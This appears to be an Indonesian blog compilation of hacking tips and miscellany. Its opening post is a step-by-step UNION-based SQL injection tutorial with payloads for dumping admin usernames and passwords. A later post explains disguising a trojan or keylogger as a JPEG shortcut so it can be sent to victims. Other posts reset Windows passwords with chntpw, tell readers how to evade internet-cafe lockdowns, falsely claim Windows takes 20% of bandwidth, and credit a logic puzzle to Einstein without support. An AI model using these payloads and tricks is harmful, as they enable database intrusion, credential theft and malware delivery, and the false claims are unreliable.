0 SQL injection step by step

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

sumber : http://indonesianhacker.or.id/

0 Mencari Password Window melalui Linux

Lupa memang masalah yang biasa dihadapi manusia. Jika lupa password login Windows, ada cara untuk memulihkannya dengan menggunakan sistem operasi Ubuntu Linux.

Hal pertama yang perlu dilakukan adalah membuat Live CD atau Live USB Flashdisk Ubuntu Linux. Ubuntu Live ini akan digunakan untuk booting ke sistem dan melakukan prosedur yang dibutuhkan untuk membongkar password Windows tadi.

untuk membuat live usb kita download UNetBootin dan menjalankannya. Aplikasi sederhana ini akan men-download versi Ubuntu yang dipilih dan melakukan instalasi pada flashdisk yang Anda siapkan.

Tahap kedua adalah menginstall utility Open Source bernama chntpw. Hal ini dilakukan dari Ubuntu dengan menjalankan Synaptic Package Manager.

Untuk bisa mendapatkan chntpw, Synaptic Package Manager harus diarahkan untuk melihat pada penyimpanan aplikasi Universe. Hal itu bisa dilakukan dengan mengklik menu Settings > Repositories pada jendela Synaptic. Kemudian, centang pilihan 'Community-maintained Open Source software (universe)' dan klik Close.

Setelah itu, klik tombol Reload dan Synaptic akan men-download informasi paket terbaru dari Universe. Setelah selesai, ketikkan chntpw pada kotak Quick Search.

Jika sudah muncul, centang kotak di sisi tulisan chnptw, pilih 'Mark for Installation'. Lalu klik Apply untuk menginstalnya.

Tahap ketiga adalah mengubah password Windows dengan chntpw.

1. Mount hardisk / drive yang berisi instalasi Windows Anda
2. Buka hardisk itu (klik Places) dan catat label drive yang muncul pada menu bar jendela file browser
3. Buka jendela Terminal (Applications > Accessories > Terminal)
4. Ketik perintah berikut pada Terminal:
cd / media
ls
5. Ketik: cd [label hardisk yang tadi Anda catat]
6. ketik: cd WINDOWS/system32/config
7. Untuk mengubah password Administrator, ketikkan perintah: sudo chntpw SAM
8. Akan muncul beberapa perintah yang bisa Anda pilih, perintah paling aman adalah membuat password jadi kosong. Lakukan ini dengan menekan angka '1', lalu tekan 'y' untuk konfirmasi
9. Pilih '2' untuk mengubah password ke kata tertentu, namun hal ini memiliki risiko error lebih besar
10. Untuk mengubah password user lain (non-administrator), ketikkan perintah berikut (dari Terminal): sudo chntpw –u [nama user] SAM

sumber www.detikinet.com

0 Teka-teki Einstein

Teka-teki ini tidak mengandung trik, hanya murni logika.

Ada 5 buah rumah yang masing-masing memiliki warna berbeda. Setiap rumah dihuni satu orang pria dengan kebangsaaan yang berbeda-beda.

Setiap penghuni rumah menyukai jenis minuman tertentu, merokok satu merk rokok tertentu dan memelihara satu jenis hewan tertentu.

Tak satupun dari kelima orang itu yang minum minuman yang sama, merokok satu merk rokok yang sama, dan memelihara hewan yang sama seperti penghuni yang lain.

PERTANYAAN : Siapakah Yang memelihara IKAN?
PETUNJUK:


Orang Inggris tinggal di dalam rumah berwarna merah

Orang Swedia memelihara anjing

Orang Denmark senang minum teh

Rumah berwarna putih terletak tepat disebelah kiri rumah berwarna coklat

Penghuni rumah berwarna putih senang minum kopi

Orang yang merokok PallMall memelihara burung

Penghuni rumah yang terletak ditengah-tengah senang minum susu

Penghuni rumah berwarna kuning merokok Dunhill

Orang Norwegia tinggal di rumah paling pertama

Orang yang merokok Marlboro tinggal di sebelah orang yang memelihara kucing

Orang yang memelihara kuda tinggal di sebelah orang yang merokok Dunhill

Orang yang merokok Winfield senang minum bir

Di sebelah rumah berwarna biru tinggal orang Norwegia

Orang Jerman merokok Rothmans

Orang yang merokok Marlboro bertetangga dengan orang yang minum air.
___________________________________________________________________________________
Albert Einstein menyusun teka-teki ini pada abad lalu.
Dia menyatakan, 98% penduduk dunia tidak mampu memecahkan teka-teki ini.
Apakah anda termasuk yang 2%?

0 exe to jpg

          Berikut adalah trik untuk menyambunyikan file ber-extensi exe ke Jpg. Juga sekaligus mengirimkan trojan atau keylogger ke korban Anda menggunakan trik ini..?

1. Pertama, membuat folder baru dan pastikan bahwa menampilkan pilihan 'hidden file dan "folder diperiksa dan' menyembunyikan ekstensi untuk jenis file yang dikenal 'tidak dicentang. Pada dasarnya apa yang Anda butuhkan adalah untuk melihat file yang tersembunyi dan melihat perpanjangan semua file Anda pada pc Anda.
2. Tempel salinan server Anda pada folder yang baru dibuat. katakanlah itu disebut 'server.exe' (itu sebabnya Anda memerlukan ekstensi file menunjukkan, menyebabkan Anda harus melihatnya untuk mengubahnya).
3. Sekarang kau akan mengubah nama ini server.exe 'untuk apapun yang Anda inginkan, katakanlah misalnya 'picture.jpeg'.
4. Windows akan memperingatkan Anda jika Anda benar-benar ingin mengubah ekstensi dari exe ke jpeg, klik YES.
5. Sekarang membuat shortcut ini 'picture.jpeg' dalam folder yang sama.
6. Sekarang bahwa Anda memiliki jalan pintas, mengubah nama untuk apapun yang Anda inginkan, misalnya, 'me.jpeg'.
7. Cek ke properties (pada file me.jpeg) dan sekarang Anda perlu melakukan beberapa perubahan di sana.
8. Pertama-tama semua teks menghapus di field 'Mulai Di' dan biarkan kosong.
9. Kemudian di field 'Target' Anda harus menulis path untuk membuka file lain (server dinamakan 'picture.jpeg') jadi anda harus menulis ini: - 'C: \ WINDOWS \ system32 \ cmd.exe / picture.jpeg c'
10. Bagian terakhir, 'c picture.jpeg' selalu nama file pertama. Jika Anda disebut file pertama 'soccer.avi' Anda harus menulis 'C: \ WINDOWS \ system32 \ cmd.exe / c soccer.avi'.
11. Jadi apa yang Anda lakukan adalah ketika seseorang mengklik 'me.jpeg', cmd akan menjalankan file lain 'picture.jpeg' dan server akan berjalan.
12. Pada file 'me.jpeg' (jalan pintas), pergi ke properti dan Anda memiliki pilihan untuk mengubah ikon. Klik itu dan sebuah jendela baru akan muncul dan Anda harus menulis ini: -% SystemRoot% \ system32 \ SHELL32.dll. Lalu tekan OK.
13. Anda dapat me-ngeset properti 'Tersembunyi' untuk file pertama 'picture.jpeg' jika Anda pikir lebih baik untuk mendapatkan koneksi dari seseorang.
14. Tapi jangan lupa satu hal, 2 file ini harus selalu berada dalam folder yang sama dan untuk terkoneksi ke seseorang yang mereka harus mengklik pada shortcut yang dibuat tidak pada file pertama. Jadi mengubah nama file ke apapun yang Anda inginkan mempertimbangkan pribadi dan pengetahuan mereka mengenai hal ini.
15. Bagi Gue misalnya Gue selalu ingin jalan pintas menampilkan terlebih dahulu agar dapat menjadi file pertama akan dibuka. Jadi Gue mengubah nama server untuk 'picture2.jpeg' dan cara pintas untuk 'picture1.jpeg'. Cara pintas ini akan ditampilkan pertama. Jika Anda me-ngeset properties tersembunyi ke server 'picture.jpeg' maka Anda tidak perlu repot-repot dengan detail ini, tetapi Gue peringatan Anda, file yang tersembunyi akan selalu muncul dalam sebuah file Zip atau Rar.
16. Karena itu, cara terbaik untuk mengirim file-file ini sama untuk seseorang kompres mereka ke dalam Zip atau Rar.

0 Mempercepat Akses Internet

Seting Windows

         Apakah anda tahu kalau selama ini Windows memakai Bandwith kita 20%? Windows itu sebenarnya mencuri 20 persen dari jalur akses internet kita karena windows merupakan OS yang selalu menginginkan Up To Date makanya dia sengaja update otomatis di background tasking kita. Jadi Untuk mengambil bandwidth kita kembali dan koneksi lebih cepat lakukan langkah berikut ini :

1.  Klik start, run trus ketik “gpedit.msc” (tanpa tanda petik).
2.  Pada computer configuration - administrative template - klik Network.
3.  Klik Qos packet scheduler - Double Klik pada Limit Reservable Bandwith.

dan Klik OK. Restart komputer anda.
Tapi semua itu juga tergantung dengan kecepatan koneksi anda sendiri. Tips ini bisa mempercepat koneksi anda jika memakai OS Windows XP, Vista dan 7.

Buat yang maen di warnet kalo mau make cara setting windows biasanya kan di warnet di disable tuh RUNnya, task manager dll. Kalo mau diaktifin dulu aja. Trus biasanya di warnet kan pake deepfreeze tuh trus kalo kompienya di restart yang ada settingannya malah balik semula lagi, kalo mau deepfreezenya di undeepfreeze aja, tapi saya ga mau nanggung akibatnya kalo ketauan sama operator warnetnya, wkakakakakaka :p
Moga2 bisa membantu

 

Google Web Accelerator
       Google Web Accelerator di desain khusus untuk mempercepat akses internet anda, khususnya anda yang menggunakan koneksi broadband (pita lebar) seperti Cable dan DSL. Untuk anda yang menggunakan koneksi lain seperti Dial-up (Telkomnet Instant atau Speedy) maupun satelit atau wave, Google Web Accelerator juga dapat mempercepat aksesnya.
        Untuk memakai Google Web Accelerator anda harus memenuhi kriteria antara lain Operating System anda harus Windows XP atau Windows 2000 dan browser anda harus Internet Explorer 5.5+ atau Mozilla Firefox 1.0+. Kalau untuk browser lainnya sebenarnya juga bisa, tetapi anda harus mengkonfigurasi proxy settings dari browser anda dengan menambah 127.0.0.1:9100 pada HTTP. Setelah anda melakukan instalasi, Google Web Accelerator akan menampilkan icon kecil di atas browser anda dan icon tray di pojok bawah layar komputer. Anda dapat mengunduh Google Web Accelerator di http://webaccelerator.google.com

Gunakan OpenDNS

• Pertama anda harus mendaftar di http://www.openDNS.com
• Setelah itu masuk ke Control Panel dari start menu, pilih network connections
• Lalu pilih koneksi anda dan klik tombol properties
• Pada bagian Internet protokol anda bisa pilih TCP/IP dan klik properties
• Masukkan angka 208.67.222.222 dan 208.67.220.220 pada opsi DNS dan restart komputer anda.